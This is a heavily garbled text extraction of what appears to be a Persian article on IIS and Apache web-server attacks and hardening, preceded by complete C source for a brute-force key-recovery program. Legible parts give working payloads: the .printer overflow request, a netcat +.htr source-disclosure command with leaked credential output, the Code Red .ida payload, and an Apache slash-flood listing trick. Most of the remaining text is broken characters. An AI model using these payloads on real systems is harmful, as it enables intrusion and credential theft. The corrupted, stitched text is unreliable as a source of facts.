#define GG(a, b, c, d, x, s, ac) { \
(a) += G ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
#define HH(a, b, c, d, x, s, ac) { \
(a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
#define II(a, b, c, d, x, s, ac) { \
(a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
void MD5Transform1(unsigned char state[16], unsigned char block[64])
{
UINT4 a = 0x67452301, b = 0xefcdab89, c = 0x98badcfe, d =
0x10325476, x[16];
unsigned int i,j;
for (i = 0, j = 0; j < 64; i++, j += 4)
x[i] = ((UINT4)block[j]) | (((UINT4)block[j+1]) << 8) |
(((UINT4)block[j+2]) << 16) | (((UINT4)block[j+3]) << 24);
/* Round 1 */
FF (a, b, c, d, x[ 0], S11, 0xd76aa478); /* 1 */
FF (d, a, b, c, x[ 1], S12, 0xe8c7b756); /* 2 */
FF (c, d, a, b, x[ 2], S13, 0x242070db); /* 3 */
FF (b, c, d, a, x[ 3], S14, 0xc1bdceee); /* 4 */
FF (a, b, c, d, x[ 4], S11, 0xf57c0faf); /* 5 */
FF (d, a, b, c, x[ 5], S12, 0x4787c62a); /* 6 */
FF (c, d, a, b, x[ 6], S13, 0xa8304613); /* 7 */
FF (b, c, d, a, x[ 7], S14, 0xfd469501); /* 8 */
FF (a, b, c, d, x[ 8], S11, 0x698098d8); /* 9 */
FF (d, a, b, c, x[ 9], S12, 0x8b44f7af); /* 10 */
FF (c, d, a, b, x[10], S13, 0xffff5bb1); /* 11 */
FF (b, c, d, a, x[11], S14, 0x895cd7be); /* 12 */
FF (a, b, c, d, x[12], S11, 0x6b901122); /* 13 */
FF (d, a, b, c, x[13], S12, 0xfd987193); /* 14 */
FF (c, d, a, b, x[14], S13, 0xa679438e); /* 15 */
FF (b, c, d, a, x[15], S14, 0x49b40821); /* 16 */
/* Round 2 */
GG (a, b, c, d, x[ 1], S21, 0xf61e2562); /* 17 */
GG (d, a, b, c, x[ 6], S22, 0xc040b340); /* 18 */
GG (c, d, a, b, x[11], S23, 0x265e5a51); /* 19 */
GG (b, c, d, a, x[ 0], S24, 0xe9b6c7aa); /* 20 */
GG (a, b, c, d, x[ 5], S21, 0xd62f105d); /* 21 */
GG (d, a, b, c, x[10], S22, 0x2441453); /* 22 */
GG (c, d, a, b, x[15], S23, 0xd8a1e681); /* 23 */
GG (b, c, d, a, x[ 4], S24, 0xe7d3fbc8); /* 24 */
GG (a, b, c, d, x[ 9], S21, 0x21e1cde6); /* 25 */
GG (d, a, b, c, x[14], S22, 0xc33707d6); /* 26 */
GG (c, d, a, b, x[ 3], S23, 0xf4d50d87); /* 27 */
GG (b, c, d, a, x[ 8], S24, 0x455a14ed); /* 28 */
GG (a, b, c, d, x[13], S21, 0xa9e3e905); /* 29 */
GG (d, a, b, c, x[ 2], S22, 0xfcefa3f8); /* 30 */
GG (c, d, a, b, x[ 7], S23, 0x676f02d9); /* 31 */
GG (b, c, d, a, x[12], S24, 0x8d2a4c8a); /* 32 */
/* Round 3 */
HH (a, b, c, d, x[ 5], S31, 0xfffa3942); /* 33 */
HH (d, a, b, c, x[ 8], S32, 0x8771f681); /* 34 */
HH (c, d, a, b, x[11], S33, 0x6d9d6122); /* 35 */
HH (b, c, d, a, x[14], S34, 0xfde5380c); /* 36 */
HH (a, b, c, d, x[ 1], S31, 0xa4beea44); /* 37 */
HH (d, a, b, c, x[ 4], S32, 0x4bdecfa9); /* 38 */
HH (c, d, a, b, x[ 7], S33, 0xf6bb4b60); /* 39 */
HH (b, c, d, a, x[10], S34, 0xbebfbc70); /* 40 */
HH (a, b, c, d, x[13], S31, 0x289b7ec6); /* 41 */
HH (d, a, b, c, x[ 0], S32, 0xeaa127fa); /* 42 */
HH (c, d, a, b, x[ 3], S33, 0xd4ef3085); /* 43 */
HH (b, c, d, a, x[ 6], S34, 0x4881d05); /* 44 */
HH (a, b, c, d, x[ 9], S31, 0xd9d4d039); /* 45 */
HH (d, a, b, c, x[12], S32, 0xe6db99e5); /* 46 */
HH (c, d, a, b, x[15], S33, 0x1fa27cf8); /* 47 */
HH (b, c, d, a, x[ 2], S34, 0xc4ac5665); /* 48 */
/* Round 4 */
II (a, b, c, d, x[ 0], S41, 0xf4292244); /* 49 */
II (d, a, b, c, x[ 7], S42, 0x432aff97); /* 50 */
II (c, d, a, b, x[14], S43, 0xab9423a7); /* 51 */
II (b, c, d, a, x[ 5], S44, 0xfc93a039); /* 52 */
II (a, b, c, d, x[12], S41, 0x655b59c3); /* 53 */
II (d, a, b, c, x[ 3], S42, 0x8f0ccc92); /* 54 */
II (c, d, a, b, x[10], S43, 0xffeff47d); /* 55 */
II (b, c, d, a, x[ 1], S44, 0x85845dd1); /* 56 */
II (a, b, c, d, x[ 8], S41, 0x6fa87e4f); /* 57 */
II (d, a, b, c, x[15], S42, 0xfe2ce6e0); /* 58 */
II (c, d, a, b, x[ 6], S43, 0xa3014314); /* 59 */
II (b, c, d, a, x[13], S44, 0x4e0811a1); /* 60 */
II (a, b, c, d, x[ 4], S41, 0xf7537e82); /* 61 */
II (d, a, b, c, x[11], S42, 0xbd3af235); /* 62 */
II (c, d, a, b, x[ 2], S43, 0x2ad7d2bb); /* 63 */
II (b, c, d, a, x[ 9], S44, 0xeb86d391); /* 64 */
a += 0x67452301;
b += 0xefcdab89;
c += 0x98badcfe;
d += 0x10325476;
/* We need to swap endianness here */
state[0] = ((unsigned char *)&a)[3];
state[1] = ((unsigned char *)&a)[2];
state[2] = ((unsigned char *)&a)[1];
state[3] = ((unsigned char *)&a)[0];
state[4] = ((unsigned char *)&b)[3];
state[5] = ((unsigned char *)&b)[2];
state[6] = ((unsigned char *)&b)[1];
state[7] = ((unsigned char *)&b)[0];
state[8] = ((unsigned char *)&c)[3];
state[9] = ((unsigned char *)&c)[2];
state[10] = ((unsigned char *)&c)[1];
state[11] = ((unsigned char *)&c)[0];
state[12] = ((unsigned char *)&d)[3];
state[13] = ((unsigned char *)&d)[2];
state[14] = ((unsigned char *)&d)[1];
state[15] = ((unsigned char *)&d)[0];
}
#define mklcpr(val)
((0xdeece66d*(val)+0x2bbb62dc)>>1)
int main(int argc, char **argv)
{
int
i;
unsigned char maybe_challenge[16], true_challenge[16];
unsigned char key[16];
char
*p;
unsigned long sec, usec, pid, ppid;
unsigned char eblock[64], cblock[64];
unsigned char *o1;
int
o2;
if (argc == 5 && strlen(argv[4]) >= 47) {
sec = strtol(argv[1], (char **) 0, 0);
pid = strtol(argv[2], (char **) 0, 0);
ppid = strtol(argv[3], (char **) 0, 0);
p = argv[4];
for (i=0; i<16; i++) {
true_challenge[i] = strtol(p, &p, 16);
p++;
}
}
else
{
printf("Usage: %s sec pid ppid "
"00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff\n",
argv[0]);
exit(1);
}
/* Set up eblock and cblock */
for(i=0;i<64;++i) eblock[i]=0;
eblock[8] = 0x80;
eblock[56] = 0x40;
for(i=0;i<64;++i) cblock[i]=0;
cblock[16] = 0x80;
cblock[56] = 0x80;
((int *)eblock)[1] = mklcpr(pid+sec+(ppid<<12));
for (usec=0; usec < (1<<20); usec++) {
((int *)eblock)[0] = mklcpr(usec);
MD5Transform1(cblock, eblock);
o2 = 0;
o1 = &(cblock[0x0f]);
do {
if ((*o1)++) break;
--o1;
} while (++o2 <= 0x0f);
o2 = 0;
o1 = &(cblock[0x0f]);
do {
if ((*o1)++) break;
--o1;
} while (++o2 <= 0x0f);
MD5Transform1(maybe_challenge, cblock);
if (memcmp(maybe_challenge, true_challenge, 0x10) == 0) {
printf("Found it! The key is ");
o2 = 0;
o1 = &(cblock[0x0f]);
do {
if ((*o1)++) break;
--o1;
} while (++o2 <= 0x0f);
MD5Transform1(key, cblock);
for (i=0; i<0x10; i++)
printf("%2.2X ", (unsigned char) key[i]);
printf("\n");
printf("usec = %lu\n", usec);
exit(0);
}
}
printf("Not found.\n");
exit(1);
}
Microsoft internet information server
(IIS)
T ,
)
O)
6)
2 0,<
"
6b. 2
O) ? •Y
B
5/
1! M,6
-,< ;!
256)
YGX$?
#
B)
)h 4
2
+' , ,F
n & n 9"
IIS )
(
<
6*
a
I
,
B ,
)
6=GX \
Y,
YGX
6 Y1
IIS
#
G ) 6, i X
0,E N T)
E
785/ 2
)
P1
# (DLL) #
B
6
6 *
) 4
,
"
! 5E
H
)
6$;.P 2
@ !
6 Y1
£ B
! B
5/
-
% G N, #
B
! B
5/…
3 B
! B
5/…
?
IIS
-
P1, -,<
IIS
?
IIS
1Q ?
#<@
- NB
4 6F
6ˆ4 b
-,< K , ,F 7c L.
" -)
"
F$showcode.asp
7
2 `56) , -,< K
0, -,< K
H O) ? • Y
785/ )_MDAC/RDS]-
' &
3
3
2 "
5
-
"
#<@$::$DATA P
<6
7 !89 "
?
0
)
# IIS
4"
56% 1 256 0
6=GX
7
- Y
7
IIS
! 5E 2
inetinfo.exe$
,6*
0, -
% ' b
.prniter,
,
4
% '
E
"
DDL
3
B'2
-
TQ
0 <
6 K
7
B ) 256 ) , 6 v 4
$,
3
IIS "
E
B
5! 7
L3 ,
4
-, < / 9 DDL " $_, <
3
F % '2
0,
bP
- N
4 j 40
N ISAPI
7 B
5! ( E
w
3
PHP)COLdfusion I K6-, "
/7
IIS S L ? "
)
- 1
@ B)
" -
6 B'" $IIS0, 5
),
@0 ,
3
f 0,
% ' $
1 2
3
'j 4 7
5G 2
ISAPI "
- Y
P4
F
'
R4 S @ ^
ISAPI
6
H B
5/
$n 9 2 "
,<
O *
"
6 ' ? 5F
6
@^
F
-, 6 U )
)
)
6%
L * iX
0,
4 ) 7 # 0_URL
6=GX) 78#
)
-, < - )@
o
"
], 5
,
5 7
6
5$
),
6'
-, 6 U )
) i.
)
H ? 5F $ F
6 ) nH
, ,F R4 S @ ^
F)
N
ntdll.dll webDAV
SL IIS )
T#< ) =GX
3
"
F
6h @
I ],
N 0, 5 6 '
-, < SL T L.
"
N
6 ) )
"
?5F
3 - *1 7
_PHP)coldfusion
$ R4 S @ ^
H
$O)
( N (, !0, - 5 - Y
F
F) E
) )
6URLb
6
, N)
#
6,
6DLL
? 5 TG' g]dos \ " 785/ ?# $ IIS 5.0
3 I
g
"
l '=GX "
8Q 0 )@
C
_SL ]
7 L
? 56 B )
- Y $O)
2 56,
-,< I
N "$ 1
) S L " U 4 IISS
R 4S
6
L C85! ) - PS L
B'\ 2 " " E
+ E'IIS 6 )
)‚
code red2 ) code red0,
_U )
k
" ,G , 5
-,< ;!
- Y Z
% .6
3 M ,6
)e
? •Y
B3
3
4
RN $p ISAPI
-,<
,F ) W 3 7 B
5! (&B $ ISAPI 6 B'"
)
O)
V < )_server side includes]SSI$_active server pages]ASP
k
?
P1]
3 ], <
7 ) X
")
F
",
)
&
, # 4 (,! % 1
, ,
& IIS
1Q0_ N T L.
,<
T L.
1
-handel
internet server application programming interface 2
<R
1
,
n 9 " 785/
1
) )
N
,
GH )
1QZ&F
P
10
I, 6, -" F
-,< ?
0, -
@-
- Y Z
< ISAPI
0 <
ISAPI DLL
0, <
'
&
IIS O)
b
- 4 '
( E ISAPI )
785/$ <
6)
&
"
4
pqqp T
785/ 2
6=GX "
" j* 2
N
# pqqp T
2
'
0
&
% )@
=
P 4
HTTP , @
-
1
@
b
ISAPI DLL )
^
?
eEye
n 9" k
‹pq C
P
0
@
1Q
F
' &
3
"
#
Digital security$pqqw
ISAPI
B'
% # ) 4_c:\winnt\system32\msw3prt.dll] B'
k
#P
< 6 N4
"T Q
-,< "
0 printer
P 4 _IPP]s
#
3)
h
0, -
(8! $,
0,
) ) pqqw T
Ÿ
0
6 B'?)
"
60, , < ? ) nimda)codered
)
ASP 7 .Y
0, <
+P
85/ 2
%
6ISAPI DLL
O) ) -,<
@"
<-
=B*
'
,@
'printer
F
ISAPI
0 ',6 3 lY 2
IPP0,
6 PF
H)
Ÿ
HOST
3
6
2
420[buffer] 5 H
H
GET/NUL.printer HTTP/1.0
HOST:[buffer]
"), )
<
<
<&
;! )_information],
=GX 2
;! ,
IIS)
0 <
P
10,
'
F- )
" , - e 'j 4 )
<
;! -
IIS
1
)
7
1/
1P 7 L
;! $ <
" , - - ) IIS # N60_ < B
H
B
G
1/
)
,
2
pqqq
O)
,4
‚,6
H) # &F ]
3
)
IIS
. [ ˆ6
)
) ,6 Ÿ IIS
3
'L
2' R
6:3
internet printing protocol
ISAPI DLL
5 printer '
&
b
)@ 6 3 +
F) ISAPI DLL
j 5
!89 ?
,
,<
F) ?
# " %P
H
" ,<
l '
bB
g +P
% '2 <
" - Y
,
5<
+.htr
3
F) ISAPI DLL
@j 5
,<
,
-
j 5 -
3
)
,
F"
G
F 0,
,6
=GX
$ < F IIS b
<N ISM.DLL
htr.txt (
F
% '+
ISM.DLL
-,
,<
'0
! 1/
7
<
"
3 TQ +.htr
'"
?@ ?
56
-, @
+
" E$
"
U)
,<
Ÿ
1Q 5 H 2
Q
/P " • & -
;! ) ,
5<
'
3
=GX -
?@
G0 , 6
1Q 2 0 <
Y bB
g
'
<
7 G:H$5 ) 4IIS
3
"
"
ISAPI DLL
<) ) N F
<
6-
_Source Disclosure]+
% '
ISAPI DLL
% '.htr,
40 ,
,
Y
E
-
2 " NetCat
Ÿ
0
N
GET/sitel/global.asa+.htr HTTP/1.0
[CLRF]
[CLRF]
5<
-,<
H
R4 S @ )
netcat B )
9P " - Y
a,
-,6
f ,
c:\>nc -vv www.victim.com 80<htr.txt
www.victim [10.0.0.10]80(http)open
200 OK
HTTP/1.0
server:microsoft-IIS/5.0
date:thu,25 jan 2001 00:50:17 GMT
<!--filename=global.asa-->("profiles_connectstring")
"DNS=profile;UID=company_user;password=secret"
("DB_connectstring")
="DSN=db;UID=company_user;password=secret"
="DSN=phf;UID=sa;pwd="
("PHFconectstring")
("sitesearchconnectionstring")="DSN=sitesearch;UID=company_user;pas
sword=simple"
("connectionstring")="DSN=company;UID=company_user;password=gu
essme"
("email_pwd")="sendaemon"
="LDAP://DIRECTORY.COMPANY.COM:389"
("ldapserver")
("LDAPUSERLD")="CN=DIRECTORY ADMIN"
("LDAPPWD")="SLAPDME"
?
$GLOPA.ASA% ' ,
T 5G 7
5<0
-,< S#
)
-,
&
,1
7 5B "
6P<
, ,< F
ISAPI DLL
R4 S @ "
N 4)
0
<
T/0,
3
@ 56-
- Y
&
,
3
6ISAPI DLL
,<
) ) 7 !89
7
;!
F) B
,
2 560
<
;!
@ MR /
0,
MR /
),
B
!$
-
'X
?
GF'
B
6
E
)
? DLL
6-,
<N MR/
7
+.HTR +
"
-,6
Ÿ
= B* A) 2 ,
6 3 ;. %LY
j 5
7 !89 ,
‚
ISAPI
: 56
+.HTR ? )&' 0 < 5 -
-,< ?@ ? j 5 ;! ?@ 1P
H GLOBAL.ASA % '
-,6
6 *
') PRINTER
'
@ MR / (,! ) , < TG' g 5
6 D l '-, ,! 78#
, <
^
I'/ IIS
)
< <N
DLL
@
F
0,
- 56DLL
I'.
@ )
6% ' 6 4
B'
<
15 / 785/ "
:A ISAPI DLL+ A
$@
CVA6 A
&2S
AA
@
A
<: $8S& IIS:
+ $A
8
#
$
h6N 0
:;d > 3 b
;
#d
>>
@
MN( d28
<< 8 :
2
)
<N ; !
,
6% ',
B$,
a,
,
-,6
T G' g
COMPUTER ) $, <
?@ 5<
"
6DLL ?
4h
U $,
DLL
PROPERTIES U
O*
)
•MASTER PROPERTIES
•WWW SERVICE
•EDIT
•PROPERTIES OF THE DEFAULT WEB SITE
•HOME DIRECTORY
•APPLICATION SETTING
•CONFIGURATION
•APP MAPPINGS
?@ ) PRINTER ,
4
B'
MSW3PRT.DLL % '$
%#<0,
N
<N
6ISAPI DLL
@
F) ISS
N56
6DLL - 56
@"
MR/
<
"
&2
<N
R4 S @
>G " T),F
, <
0
& &H
" %# < ,
-
P
1
^
?
<
+
! "
ACTIVE
SERVER
.ASP
BUFFER
PAGES
OVERFLOWS,MS02-
FUNCTIONALITY
018
WEB-BASED
.HTR +.HTR
PASSWORD RESET
SOURCE
DISCLOSURE,MS01004
INTERNET
.IDC
6
DATABASE
?
#
<@
Q193689$O)
CONNECTOR
SERVER-SIDE .STM,SHTM,SHTM1
'
INCLUDE
&
MS01-044$ )
INTERNET
.PRINTER -
'
PRINTER
&
MS01-023 )
INDEX SERVER
.IDA,IDQ -
'
&
MS01-033$ )
FRONTPAGE UNINSTALL FPSE
SERVER
EXTENSION
REMOTE
RAD SUPPORT MS01-
IUSR
'
&
RAD
035
SUPPORT
' ) # HOTFIX )PATCH
ISAPI DLL
+'
,
&
N =B*
<N
6
6 g8 0
F)
MS01-026,
-
-
R4 S @
1
),<
6PATCH " ,
-,Y
-, @
6-,
5< #
@ 78#
ISAPI DLL
, -, < ,
)
SL B )
6%
4 MR/
ISAPI DLL 78#
P
9
6S
%
B
5F " 0
F) 78#
N +'
' ) #
‹
R4 S @ () , 7
B)
@]
4
,N
-
%/
N
<
') #
A &
microsoft security bulletine
5<
6 g8 2 " ( ,
6 _, <
0,
,4
' ) # $, ,F 6PATCH
0
-
pqqwT
R4 S @ ?@
")
_HFNETCHK.EXE]
Š
j 4
HFNETCHK # " % P
H P
10, 6
-, < -
A &
' ) # -
6? ,
6
?# 0, K5 SL
' ) # b
-,< ( E
-, < K
6
<
"
(N
"
")
0,6
(E$
-
'
("c$
- Y IIS - 5 PHP
P ),
6
" #
GF
F
l '7c L.
? @ ) - @ T L.
) UPDAE WINDOWS
6U )
(N
$ ' ) #
6
-, < 'X 7c L.
g] -,< 'X 7c L.
2 ),
\) <
-, < 'X
6
)
HOTFIX i:
3 7 !89 , # j 4
-, < K PATCH 2 3@
:
5 HFNETCHK
6
XML B
X !
P
1
#P< HOTFIX -,
K
) PER1IIS,COULDDUSION I
"
1
6 #P< "
6PATCH 2 3@ -
- N4"
PATCH ,
I
5< IIS )
) SERVICE PACK A & ) ,
b
g8 2 p• -, 6 ?
6PATCH % <$
bP ) ("c
? ,
IIS
("c ) - P ' ) #
0, 6 ( E C
IIS
3
_ ') #
URLSCAN,IISLOCHDOWN " - Y
ISSLOCKDOWN WIZARD (
, #4
0,<
)“CUSTOM’
3 &
1/
IISS L
d*
6 '$ IIS SL
a
T G'
g
0
ISS
$
l '
^ P
6U )
5< -, 6 U )
&
d*
F
3
:
' ) # $pqqw T
j
$ ?@
I
7
"7
B, 6
"
3)
: 56)
%
4
IIS
“EXPERT“
u?
u T5! ?# $ S
-" Fa
2, 0 5
)
•
P
1_NNTP,SMTP,FTP,WWW],
5
network hotfix checker
5< I
- 5 -, < K
b
C 5!
6
5 MR/ )_,<
T) ,
5
7
< " $O)
.
6 ISAPI
•
?@
F)
+ 2 `56) IIS
Z F " O) -, 6 U )
0_TFTP.EXE )CMD.EXE I ]
g
%
N ]WEBDAV ? 5 T G' ga 'X
b. #
EXTENSIONS ?
- Y ?5F
gaSCRIPT
5 T G'
MAPS•
_PRINTER)ISM)IDQ)HTRa I ]
@ 2' R ) IIS
CP
-
-, < -
1 c
6
' B
H" %
6
3
5 ‚,
>G
P
10, <
? 5
% !
N
5
E
6 PF -
) 4
3 7 L*
"
IIS W
L*
#4
#B
5! )
O) -, 6 U )
) %
9
?
B
F
5 ) ,<
-
& aURLSCAN•
B'
ˆ 6 6hotfix) SERVICE PACKS L -
,
# $,
,
6 "
@
ˆ6
)
IISLOCKDOWN0,
&
6 PF " )
S L
) "
"
,
2
,F 7
# ?@
6& ? "
URLSCAN$
-,
5 (E
, "), )
IISLOCKDOWN
#4
3
IISLOCKDOWN0
0,< %'g N
@"
@
I'. ˆ 62 `56$, 6
) L*
) X
? 5
B3
URLSCAN
L ,
P
1
5<0 < SL _IISLOCK.EXE] IISLOCKDOWN
a, 6 ( E
C:\>IISLOCK.EXE/Q/C/T:C:\LOCKDOWN_FILES
IISLOCKDOWN n 9 " URLSCAN SL
,<
N A)
0 < SL ,
,
,
'
-,
ISAPI
3
5L ) ,<
37
URLSCAN.INI)URLSCAN.DLL % ') % < URLSCAN
,<
,<
P
1
B' URLSCAN.DLL0
IIS # " % PH ) ,
,
% 5! % K/
H$SL
,
?56
H IIS B
F
)
# 4 % ' URLSCAN.INI ) , % B
.
' R4 URLSCAN ISAPI b
, PHTTP
3
@,
\
$,
% ' P
1]0 <
- 3•SL
URLSCAN.LOG (
?56
3•URLSCAN.MMDDYY.LOG(
-
2 #5 A &
HTTP 404 OBJECT NOT v 4 ,
HTTP
4
P
[
FOUND
'
5 URLSCAN , # 4
3
6
URLSCAN_ <
3
0,
"
% '
?
a 'R ,<
_- g ) HEAD)POST)GET,
7 5B ]
-,<
,
5 H2
3
3
, , 6 3 ,G ;/P ] V #
<) h
…
4h
…
6URL h
…
B',
-,< &
_,<
6URL
NON-ASCII
6
"
3
: X
nP9 ,
6
>/ h
…
3S
>/ h
…
6, @
>/ h
…
W L*
F) d *
6
4
2 " (,
6
0, < <R URLLSCAN.INI % '
6)
<
&
IIS ?,< F ? "
,
0 < " , - - ) IIS
<
b' URLSCAN.INIa #
T5!
" b'?@
#P< 6"
,
7
"
B') ,
-
B)
N
" ?)
5 ?
, 4 bB
4
2 ,@
#6
,
)
F
?
T/0,
)
F) 3 -,
B' ?
,63
B $
H
5
2 )
0,
•
!"
" #$ %
-
0
H % PH "
TCP SYS
&
4
%
7
) )
z 3
%
j @
N$, 5
)$
<
* +!
- 4
& 21
)
H
@ &F
b'
' (!
"
)
5 0% F O) )
?@ -
B'
26• c 5G
6 F) 3
%3 " 7 9P
-,
u
(E
^P
#P<
6
3
6
,
< 5 V B, @
], <
%3
\)
<
6
?)
3
,
* 4
,
E
2
?# 2
P
1
)
)
_€ Y
+ H) P[ )
V ,
-,
•Y
? )"
H)$
)0
\X
&
2 ?, 5 ' B
IDA/IDQ ISAPI 6,
4 )
6-,
<N
NIMDA)CODE RED (
2 0,
% )
) pqqw T
+ H) P
[ % ',
,
"
3)
- 1
@
"
),
'
)
#
"
B
5/
' &
f
2
, ,F
, 1 ;!
? < 3 6h) ) , 56
&
2 "
R4 S @
. CODE RED (
P
< B
3,
<) " N
ISAPI DLL
TP $,<
-,
6)
,
"
pqqp
-,< - 1
@‘
‘
6)
GET/DEFAULT .IDA?NNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNN%0U6858%0UBD3%0U4570%0U7801%0UU9090%0
U6858%0UCBD3%0U78%0U455%0U00000%0U00=A7
0,
E - 1
@
\X
%SYSTEM%\NOTWORM
2 -, 6 ?
- 1
@ CODE RED (
2 `560, <
,4
u( 2
,<
7# 2
N4
@V#
3
<
0, 6,
9
2 -, 6 ? $
-
+ H) P
[ 6% ' 5I 7
0, <
; +!0x90 0x90 %u9090 # :
,<
% ' ROOT.EXE % ' >/
- 1
@
6% '2 `56),
560,
>/ TQ ? !
X /T /
"), ) % < 7
NIMDA(
,<
)
% ' ,G 2 `56NIMDA)CODE RED
6
-
./0
(
7
,
)
H?
,
"
,
8
+
5 5<
,
+1 2 " 34 5
6
nop " @A x86 =
U4
4
78
> ?
8
6-
"( 7
<
-source code
#' , <
,
:B
g e '2 0
N
,
6U
a
"
SQL 7
,
‚, <
"
5 5 <+
% 5< 6:3 2
B)
-
-N4
'%#
IIS
6, ?,
5! "
^P
1#< 2
4
.INC
@?
0
!89$% 5 h @ ,
T5!
,<
6,
(
?
4
)
j 4
I 7
R4 S @ ?
2
" %P
H U 40 , < - @ ,
R4 S @ ) , <
-
85/ 2
& 7 5B…
INCLUDE
B'" - Y …
#
.
#
)
?)
0,
0
6 3 ;. %LY
<) 2
9
"
R4 S @ ^
@ +'
F
6N 4
,
)-
,4
N -
#
3
,G ;/P
HTTP GET
R4 S @
OK(/DEFAULT.ASP
/DEFAULT.ASP+.HTR
+.HTR SOURCE DISCLOSURE
ERROR
PERFORMING
MS01-004
/FILE.STM,.SHTM,.SHTM1
WEB
QUERY
500
j 4
2 ? N
SOURCE MUST BE PRESENT
500
# , <
R4 S @ v 4
j 4% H
200
I'.
3$, 6 ( E 5< B
!
( ,H
-
3 #P< I 7
?@ " ?5F
?
7 .X …
?5 3
,
"
#
7 L
u2 & N
Y* 7 !89
6 <…
< ASP
00 ) & 7 5B$
,
S#
2<) ) iX ) ?
GLOBAL.ASA % ' 2<) ) .ASP,
`@
H U ˆ6,
>G ,
0, <
)
d*
INTERNAL
ERROR;HTML
ERROR IN WEB
SERVER
DIRECTORY
PATH
DISCLOSURE ,Q193689
/NULL .PRINTER
.PRINTER
CONTAINS
BUFFER
OVERFLOW ,MS01-023
PRINTER
INSTALL
200
OK;HTML
CONTAINS
/NULL.IDA,IDP
INDEX
SERVER
BUFFER
THE IDQ FILE..COULD NOT
OVERFLOW,MS01-033
BE FOUNS
200
OK;HTML
THE
CONTAINS
FORMAT
/NULL.HTW
WEBHITS
OF
SOURCE
DISCLOSURE>MS00-006
QUERY_STRING IS INVALID
200 OK (/FILE .STM MUST BE
/FILE.STM ,.SHTM,.SHTM1
SERVER
PRESENT)
501 NOT IMPLEMENTED
SIDE
INCLUDES
BUFFER OVERFLOW
/_VTI_BIN/_VTI_AUT/FP30REG.DLL
FRONTPAGE
SERVER
EXTENSION
BUFFER
OVERFLOW,MS01-035
a+
1-HACKING
EXPOSED
–WEB
APPLICATION
,JOEN
SCAMBRAY,MIKE SHEMA
2-WEB
HACKING
–ATTACKS
DEFENSE,STUART
MCCLURE ,SAUMIL SHAH,SHREERAJ SHAH
3-WWW.SRCO.IR
a ,
, < +H ) B
5/
6
ˆ60, -,< F
2
)
') G O)
R4 S @ " 5<
(E
)
6 )
?@ n 9 "
@ )
6
2#5
N
,<
" 7, ,
5 $,< 62 ) #.
)
2
2 `560 <
& 21
)
, LH E
)
6)
B3
0 )
$
6$ O)
()
R4 S @ )
< ;. NETSCAPE) IIS)APACHE? `56
R4 S @ -, 4 2 ,
N N %B
. ) DOS1 785/
6
) 'G U
)
6,
H
@ 15G )
5!
0 "
0
785/
1
,
N
–denial of service
B3 X / T /
,
G1:
$, < , Y -8
j * 2 5<
56 ‚, <
,< 6
N,
)
') )
-
)M
6 #< TP
BPH "
3
,
B3
,
/
? ) "
# TH
APACHE
0
)
5
O) ? , 6 U )
78#
4 $_IIS]
) %K
0
CA-2002-17,CA-2002-]
=GX
-
0
6 ' " 7, ,
-
R4 S @
? `56) <
R4 S @ ^
bP
!
)
h / 6-
_
?@
l '? #
4@0, <
-)8!0
4@ -, 6 U )
- Y "), )
I =B*
R4 S @ ^
B!
? 5 TG' g•
,
] -, 6 U
•
4@
6*
? '- 9*
H U#
1) U#
N
&
)j 5•
•
#
"
R4
) - " -, 6 U )
4@ Z F
PL $ U
6
) 6% '2 3 , - 9*
3)
-)8!
6 „ 1 # $_27
_DOS] U )
e 'j 4 7
F)
& O) -, 6 U )
"$ ?@
6*
&
)
6
"
5
" ,G )
?
4@$
" \ 2 0 5 SL & , 5
0,<
7
3 O) 7 .Y
-
H
,
)
H8! h
?8'
6
,
<R 2
3 F S1H ) ,
9
,
?@
APACHE
1
)„
,<
- *1
"
APACHE
1
)„ 2 56)
Pc
3W 3
e ' ) #17 E
E
3
- *1
ORF 3
.Y ?8' ) , -,6
4@
O) -, 6 U )
& PHP)CGI
R4 S @ ^
F) 7
a
') #
3W 3
# _APACHE]
"
4@ , ) 6T)„
3W 3
S @^
2 1
),
T25&
,
! X
I 2
) 7 .Y
0,
,
3 ,
-,6
7 .Y j 5 ) / 9
y
,
, 6, -" F , P 4 \ X
2
#
0 ,6
H :3 e G
0
)
6
5 ) TQ
c 9 6SLASH B )
) MOD_DIR,MOD_NEGOTIATE
1
)„ ?
"
?
1
6URL 5F
c 9
MOD_AUTOINDEX
? 56
. APACHE
R4 S @ 2 0 ,6 j 5
2001 h
APACHE 1.3.19 *
A8 ) 8
1P
5
1)
B "
URL
0
B3 j
Y0
"
B "
,4 P
B
g O) )
- 4
GH ) , G0, 6 j 5
?@ B )
#
5 APACHE 6 )
,
2
0,
A"
1
2<
?
< Y,
E
#0
& URL
:&i2L + $0@
, #4 B)
%#
1
)„ 0
) e
'j
)$,
.
'
H )
,
APACHE
'&
F)
2 %/
(,
6
)
APACHE #
) $,< , 4
B1 ˆ 60
-, @
"
H APACHE )
1
)„ 2 0,
MR /
# 0,6j 5
0
B
2
MOD_DIR)MOD_AUTOINDEX
47
1,
,
Q
0,< +' APACHE 1.3.19
2
<+
2#5
1) ,<
8000 "
4
?
? ! $
B
B3 PERL
B
5/ 2 -
"
? 5$
/CGI-BIN///////////////////////////////////////////////////S
7) Y
;!
MARTIN KREAMER
- '4j 4)-
" ,G
<
93
@ APACHE ?
%
, 6, j 5
? "
3 O) )
,
- Y ,
1
)„
N MR/ ) 1
[ROHAN APACHE]$./CONFIGURE –DISABLE-MODULE=DIRDISABLE-MODULE=AUTOINDEX
APACHE
2
,
60
#
', 6 3 B
H" 6
Y
0,
Y1* $ ,
? ?
)
B)
-
"
1Q
2
P10
3
<8 6
6 BH 2 , ,F
,<
1
2001 c F
n 9
, $
APACHE
0
1 " ,<
6 3 P
.
,Y
(5
[ \X
1 ,6 *
-,< e !
'?
B
,
1NETCAT
6
PASSWORD % '? 56c /
"
)
F
3
B
5/ 2 0,< A & BUGTRAQ
0, <
-, @
# 2
O)
,
" KEVINb
,
a,6 j 5
B
APACHE)MULTIVIEWS
R4 S @
)
) X
,4
BRASSCONNON.NET
"
,<
4
, -" F ?), APACHE0
$ )
"
MOD-DIRT)„ MR /
2
F) 3 P
1
,<
6)
6
